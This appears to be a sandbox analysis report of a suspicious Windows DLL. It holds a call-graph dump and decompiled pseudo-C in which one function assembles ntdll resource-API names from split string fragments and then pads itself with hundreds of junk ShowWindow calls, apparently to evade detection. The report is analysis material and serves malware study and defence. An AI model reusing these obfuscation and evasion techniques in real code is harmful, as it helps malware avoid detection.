100068d7 _memcpy_s 69 API calls 12357->12358 12359 100014d1 ctype 12357->12359 12358->12359 12359->12349 12361 1000680b 12360->12361 12362 1000682d EnterCriticalSection 12360->12362 12361->12362 12363 10006813 12361->12363 12365 10006823 12362->12365 12364 1000ba3c __lock 69 API calls 12363->12364 12364->12365 12366 10008fa9 12365->12366 12368 10008fbb 12366->12368 12373 10008fdc 12366->12373 12367 10008fc7 12369 1000b02e _fputc 69 API calls 12367->12369 12368->12367 12368->12373 12376 10008ffa __setlocale_set_cat 12368->12376 12370 10008fcc 12369->12370 12371 1000708c _fputc 7 API calls 12370->12371 12371->12373 12378 10009183 12373->12378 12376->12373 12381 10008cc5 12376->12381 12387 1000e545 12376->12387 12393 1000ee57 12376->12393 12418 1000e577 12376->12418 12598 1000686c 12378->12598 12380 1000918b 12380->12327 12382 10008cde 12381->12382 12386 10008d00 12381->12386 12383 1000e545 __fileno 69 API calls 12382->12383 12382->12386 12384 10008cf9 12383->12384 12385 1000ee57 __locking 103 API calls 12384->12385 12385->12386 12386->12376 12388 1000e569 12387->12388 12389 1000e554 12387->12389 12388->12376 12390 1000b02e _fputc 69 API calls 12389->12390 12391 1000e559 12390->12391 12392 1000708c _fputc 7 API calls 12391->12392 12392->12388 12394 1000ee63 _flsall 12393->12394 12395 1000ee86 12394->12395 12396 1000ee6b 12394->12396 12398 1000ee94 12395->12398 12402 1000eed5 12395->12402 12439 1000b041 12396->12439 12400 1000b041 __locking 69 API calls 12398->12400 12401 1000ee99 12400->12401 12404 1000b02e _fputc 69 API calls 12401->12404 12442 10014b90 12402->12442 12403 1000b02e _fputc 69 API calls 12406 1000ee78 _flsall 12403->12406 12407 1000eea0 12404->12407 12406->12376 12409 1000708c _fputc 7 API calls 12407->12409 12408 1000eedb 12410 1000eee8 12408->12410 12411 1000eefe 12408->12411 12409->12406 12452 1000e724 12410->12452 12413 1000b02e _fputc 69 API calls 12411->12413 12415 1000ef03 12413->12415 12414 1000eef6 12511 1000ef29 12414->12511 12416 1000b041 
__locking 69 API calls 12415->12416 12416->12414 12419 1000e545 __fileno 69 API calls 12418->12419 12420 1000e587 12419->12420 12421 1000e592 12420->12421 12422 1000e5a9 12420->12422 12423 1000b02e _fputc 69 API calls 12421->12423 12424 1000e5ad 12422->12424 12432 1000e5ba __flsbuf 12422->12432 12434 1000e597 12423->12434 12425 1000b02e _fputc 69 API calls 12424->12425 12425->12434 12426 1000e61b 12427 1000e6aa 12426->12427 12428 1000e62a 12426->12428 12429 1000ee57 __locking 103 API calls 12427->12429 12430 1000e641 12428->12430 12435 1000e65e 12428->12435 12429->12434 12431 1000ee57 __locking 103 API calls 12430->12431 12431->12434 12432->12426 12433 10013630 __flsbuf 69 API calls 12432->12433 12432->12434 12436 1000e610 12432->12436 12433->12436 12434->12376 12435->12434 12562 1001497a 12435->12562 12436->12426 12559 1000e6db 12436->12559 12440 1000c36a __getptd_noexit 69 API calls 12439->12440 12441 1000b046 12440->12441 12441->12403 12443 10014b9c _flsall 12442->12443 12444 10014bf7 12443->12444 12447 1000ba3c __lock 69 API calls 12443->12447 12445 10014c19 _flsall 12444->12445 12446 10014bfc EnterCriticalSection 12444->12446 12445->12408 12446->12445 12448 10014bc8 12447->12448 12449 10014bdf 12448->12449 12450 10013b8c ___lock_fhandle InitializeCriticalSectionAndSpinCount 12448->12450 12514 10014c27 12449->12514 12450->12449 12453 1000e733 __ftelli64_nolock 12452->12453 12454 1000e765 12453->12454 12455 1000e78c 12453->12455 12485 1000e75a 12453->12485 12457 1000b041 __locking 69 API calls 12454->12457 12458 1000e7f4 12455->12458 12459 1000e7ce 12455->12459 12456 10007528 __setlocale_set_cat 5 API calls 12460 1000ee55 12456->12460 12461 1000e76a 12457->12461 12463 1000e808 12458->12463 12518 100148f5 12458->12518 12462 1000b041 __locking 69 API calls 12459->12462 12460->12414 12464 1000b02e _fputc 69 API calls 12461->12464 12465 1000e7d3 12462->12465 12528 10013630 12463->12528 12467 1000e771 12464->12467 12469 1000b02e _fputc 69 API calls 12465->12469 12470 
1000708c _fputc 7 API calls 12467->12470 12473 1000e7dc 12469->12473 12470->12485 12471 1000e813 12472 1000eab9 12471->12472 12477 1000c3e3 __getptd 69 API calls 12471->12477 12475 1000ed88 WriteFile 12472->12475 12476 1000eac9 12472->12476 12474 1000708c _fputc 7 API calls 12473->12474 12474->12485 12480 1000ea9b 12475->12480 12481 1000edbb GetLastError 12475->12481 12478 1000eba7 12476->12478 12501 1000eadd 12476->12501 12479 1000e82e GetConsoleMode 12477->12479 12500 1000ec87 12478->12500 12503 1000ebb6 12478->12503 12479->12472 12483 1000e859 12479->12483 12482 1000ee06 12480->12482 12480->12485 12487 1000edd9 12480->12487 12481->12480 12482->12485 12486 1000b02e _fputc 69 API calls 12482->12486 12483->12472 12484 1000e86b GetConsoleCP 12483->12484 12484->12480 12509 1000e88e 12484->12509 12485->12456 12489 1000ee29 12486->12489 12491 1000ede4 12487->12491 12492 1000edf8 12487->12492 12488 1000eb4b WriteFile 12488->12481 12488->12501 12496 1000b041 __locking 69 API calls 12489->12496 12490 1000eced WideCharToMultiByte 12490->12481 12493 1000ed24 WriteFile 12490->12493 12497 1000b02e _fputc 69 API calls 12491->12497 12540 1000b054 12492->12540 12499 1000ed5b GetLastError 12493->12499 12493->12500 12494 1000ec2b WriteFile 12494->12481 12494->12503 12496->12485 12498 1000ede9 12497->12498 12502 1000b041 __locking 69 API calls 12498->12502 12499->12500 12500->12480 12500->12482 12500->12490 12500->12493 12501->12480 12501->12482 12501->12488 12502->12485 12503->12480 12503->12482 12503->12494 12505 100140d4 11 API calls __putwch_nolock 12505->12509 12506 1000e93a WideCharToMultiByte 12506->12480 12508 1000e96b WriteFile 12506->12508 12507 100137cc 81 API calls __fassign 12507->12509 12508->12481 12508->12509 12509->12480 12509->12481 12509->12505 12509->12506 12509->12507 12510 1000e9bf WriteFile 12509->12510 12537 1001381e 12509->12537 12510->12481 12510->12509 12558 10014c30 LeaveCriticalSection 12511->12558 12513 1000ef31 12513->12406 12517 1000b962 

                                                                                                                                Executed Functions

                                                                                                                                Control-flow Graph

                                                                                                                                C-Code - Quality: 98%
                                                                                                                                			E10002460(void* __ebp) {
                                                                                                                                				signed int _v4;
                                                                                                                                				CHAR* _v8;
                                                                                                                                				struct HWND__* _v12;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				signed int _v28;
                                                                                                                                				char _v32;
                                                                                                                                				intOrPtr _v36;
                                                                                                                                				intOrPtr _v44;
                                                                                                                                				CHAR* _v52;
                                                                                                                                				CHAR* _v56;
                                                                                                                                				CHAR* _v60;
                                                                                                                                				struct HWND__* _v64;
                                                                                                                                				char _v72;
                                                                                                                                				CHAR* _v80;
                                                                                                                                				void* _v84;
                                                                                                                                				CHAR* _v88;
                                                                                                                                				struct HWND__* _v92;
                                                                                                                                				intOrPtr _v96;
                                                                                                                                				char _v100;
                                                                                                                                				CHAR* _v108;
                                                                                                                                				struct HWND__* _v112;
                                                                                                                                				CHAR* _v116;
                                                                                                                                				void* _v120;
                                                                                                                                				char _v128;
                                                                                                                                				char _v132;
                                                                                                                                				CHAR* _v136;
                                                                                                                                				struct HWND__* _v140;
                                                                                                                                				CHAR* _v144;
                                                                                                                                				CHAR* _v148;
                                                                                                                                				struct HWND__* _v152;
                                                                                                                                				char _v156;
                                                                                                                                				char _v160;
                                                                                                                                				CHAR* _v164;
                                                                                                                                				void* _v168;
                                                                                                                                				CHAR* _v172;
                                                                                                                                				struct HWND__* _v176;
                                                                                                                                				CHAR* _v184;
                                                                                                                                				CHAR* _v192;
                                                                                                                                				struct HWND__* _v196;
                                                                                                                                				CHAR* _v200;
                                                                                                                                				void* _v204;
                                                                                                                                				CHAR* _v212;
                                                                                                                                				struct HWND__* _v216;
                                                                                                                                				CHAR* _v220;
                                                                                                                                				void* _v224;
                                                                                                                                				CHAR* _v228;
                                                                                                                                				void* _v232;
                                                                                                                                				char _v236;
                                                                                                                                				CHAR* _v240;
                                                                                                                                				struct HWND__* _v244;
                                                                                                                                				CHAR* _v248;
                                                                                                                                				void* _v252;
                                                                                                                                				CHAR* _v256;
                                                                                                                                				void* _v260;
                                                                                                                                				char _v264;
                                                                                                                                				char _v268;
                                                                                                                                				char _v276;
                                                                                                                                				intOrPtr _v280;
                                                                                                                                				CHAR* _v288;
                                                                                                                                				struct HWND__* _v292;
                                                                                                                                				char _v308;
                                                                                                                                				intOrPtr _v312;
                                                                                                                                				char _v316;
                                                                                                                                				intOrPtr _v320;
                                                                                                                                				char _v324;
                                                                                                                                				char _v328;
                                                                                                                                				struct HWND__* _v332;
                                                                                                                                				struct HINSTANCE__* _v336;
                                                                                                                                				struct HWND__* _v340;
                                                                                                                                				void* _v344;
                                                                                                                                				char _v348;
                                                                                                                                				char _v352;
                                                                                                                                				long _v356;
                                                                                                                                				void* _v357;
                                                                                                                                				void* _v365;
                                                                                                                                				void* __ebx;
                                                                                                                                				void* __edi;
                                                                                                                                				void* __esi;
                                                                                                                                				signed int _t164;
                                                                                                                                				char* _t1284;
                                                                                                                                				CHAR* _t1285;
                                                                                                                                				CHAR* _t1288;
                                                                                                                                				_Unknown_base(*)()* _t1289;
                                                                                                                                				signed int _t1294;
                                                                                                                                				void* _t1296;
                                                                                                                                				void* _t1302;
                                                                                                                                				intOrPtr* _t1303;
                                                                                                                                				int _t1305;
                                                                                                                                				void* _t1363;
                                                                                                                                				void* _t1365;
                                                                                                                                				signed int _t1372;
                                                                                                                                				void* _t1374;
                                                                                                                                				void* _t1377;
                                                                                                                                				signed int _t1378;
                                                                                                                                
                                                                                                                                				_t1372 =  &_v344;
                                                                                                                                				_t164 =  *0x1001b694; // 0x9a1487b
                                                                                                                                				_v4 = _t164 ^ _t1372;
                                                                                                                                				_v332 = 0;
                                                                                                                                				_v340 = 0;
                                                                                                                                				_v324 = 0x17;
                                                                                                                                				_v320 = 0x1e55;
                                                                                                                                				_v316 = 0x409;
                                                                                                                                				_v8 = 0xf;
                                                                                                                                				_v12 = 0;
                                                                                                                                				_v28 = 0;
                                                                                                                                				E10001720(0,  &_v32, "Ldr", 3);
                                                                                                                                				_v212 = 0xf;
                                                                                                                                				_v216 = 0;
                                                                                                                                				_v232 = 0;
                                                                                                                                				E10001720(0,  &_v236, "Acces", 5);
                                                                                                                                				_v136 = 0xf;
                                                                                                                                				_v140 = 0;
                                                                                                                                				_v156 = 0;
                                                                                                                                				E10001720(0,  &_v160, "sResource", 9);
                                                                                                                                				_push( &_v168);
                                                                                                                                				_push( &_v252);
                                                                                                                                				_push( &_v56);
                                                                                                                                				_push(E10001B80( &_v56, _t1363, 0xf,  &_v336));
                                                                                                                                				E10001B80( &_v56, _t1363, 0xf,  &_v84);
                                                                                                                                				_t1374 = _t1372 + 0x18;
                                                                                                                                				_t1381 = _v312 - 0x10;
                                                                                                                                				if(_v312 >= 0x10) {
                                                                                                                                					E10006B91(0, 0x10, _t1365, _t1381, _v308);
                                                                                                                                					_t1374 = _t1374 + 4;
                                                                                                                                				}
                                                                                                                                				_v336 = LoadLibraryA("ntdll.dll");
                                                                                                                                				_v148 = 0xf;
                                                                                                                                				_v152 = 0;
                                                                                                                                				_v168 = 0;
                                                                                                                                				E10001720(0,  &_v172, "LdrF", 4);
                                                                                                                                				_v240 = 0xf;
                                                                                                                                				_v244 = 0;
                                                                                                                                				_v260 = 0;
                                                                                                                                				E10001720(0,  &_v264, "ind", 3);
                                                                                                                                				_v108 = 0xf;
                                                                                                                                				_v112 = 0;
                                                                                                                                				_v128 = 0;
                                                                                                                                				E10001720(0,  &_v132, "Resour", 6);
                                                                                                                                				_v200 = 0xf;
                                                                                                                                				_v204 = 0;
                                                                                                                                				_v220 = 0;
                                                                                                                                				E10001720(0,  &_v224, "ce_U", 4);
                                                                                                                                				_push( &_v232);
                                                                                                                                				_push( &_v148);
                                                                                                                                				_push( &_v288);
                                                                                                                                				_push( &_v204);
                                                                                                                                				_push(E10001B80( &_v288, 0x10, 0xf,  &_v316));
                                                                                                                                				_push(E10001B80( &_v344, 0x10, 0xf,  &_v344));
                                                                                                                                				E10001B80( &_v344, 0x10, 0xf,  &_v120);
                                                                                                                                				_t1377 = _t1374 + 0x24;
                                                                                                                                				_t1382 = _v320 - 0x10;
                                                                                                                                				if(_v320 >= 0x10) {
                                                                                                                                					E10006B91(0, 0x10, _t1365, _t1382, _v308);
                                                                                                                                					_t1377 = _t1377 + 4;
                                                                                                                                				}
                                                                                                                                				_v288 = 0xf;
                                                                                                                                				_v292 = 0;
                                                                                                                                				_v308 = 0;
                                                                                                                                				_t1383 = _v260 - 0x10;
                                                                                                                                				if(_v260 >= 0x10) {
                                                                                                                                					E10006B91(0, 0x10, _t1365, _t1383, _v280);
                                                                                                                                					_t1377 = _t1377 + 4;
                                                                                                                                				}
                                                                                                                                				ShowWindow(0, 0); // executed
                                                                                                                                				ShowWindow(0, 0); // executed
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                 				/* ShowWindow(0, 0); repeated 241 more times */
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
                                                                                                                                				ShowWindow(0, 0);
